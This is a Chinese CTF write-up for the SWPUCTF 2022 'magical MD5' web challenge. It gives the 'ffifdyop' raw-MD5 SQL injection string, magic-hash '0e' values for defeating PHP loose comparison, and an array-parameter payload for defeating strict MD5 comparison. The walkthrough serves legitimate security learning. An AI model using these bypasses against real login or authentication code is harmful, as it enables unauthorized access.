NSSCTF每日一题_Web_[SWPUCTF 2022 新生赛]奇妙的MD5

为了保持做题的感觉和持续学习,也就有了每日一题系列,选一些有意义的题目或者一些CTF新颖题目作为参考学习。

[SWPUCTF 2022 新生赛]奇妙的MD5

1. 访问首页界面并进行分析

估计题目MD5提示,查询得知

ffifdyop 这个字符串是一个奇妙的MD5字符串

因为将"ffifdyop"MD5每两位十六进制对应一个 ASCII 字符之后有'or'6 ,本身看似无意义,但一旦放入早期未做安全防护的 SQL 登录验证语句 中,就会瞬间改变逻辑,代入SQL后语句会被解析为查询逻辑为 **"真,**导致整个查询条件恒成立,实现 SQL注入攻击

2.查询字符串ffifdyop

3.查看源码,绕过弱比较

复制代码
<!--
$x= $GET['x'];
$y = $_GET['y'];
if($x != $y && md5($x) == md5($y)){
    ;
-->

#字符不相同,但是md5值相同

0e 绕过 即可

复制代码
?x=QNKCDZO&y=240610708

(这类字符有很多)

复制代码
QNKCDZO
240610708
314282422
571579406
903251147
s878926199a
s155964671a
s214587387a
s214587387a

4.下一步,数组绕过强比较

复制代码
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
    echo $FLAG;
} 

wqh[]=1&dsy[]=2
相关推荐
三七吃山漆18 小时前
攻防世界——ics-05
网络·安全·web安全·ctf
三七吃山漆2 天前
攻防世界——Web_php_wrong_nginx_config
开发语言·nginx·安全·web安全·网络安全·php·ctf
unable code3 天前
攻防世界-Misc-Wire1
网络安全·ctf·misc·1024程序员节
JM丫4 天前
buuctf-ciscn_2019_es_2(栈迁移)
ctf
unable code4 天前
攻防世界-Misc-Miscellaneous-200
网络安全·ctf·misc
unable code5 天前
攻防世界-Misc-4-1
网络安全·ctf·misc·1024程序员节
unable code6 天前
攻防世界-Misc-2-1
网络安全·ctf·misc
Aerelin7 天前
《静态分析:GUI程序的明码比较》
逆向·ctf
Aerelin7 天前
Windows GUI 逆向分析题(CrackMe)
逆向·ctf
三七吃山漆8 天前
攻防世界——wife_wife
前端·javascript·web安全·网络安全·ctf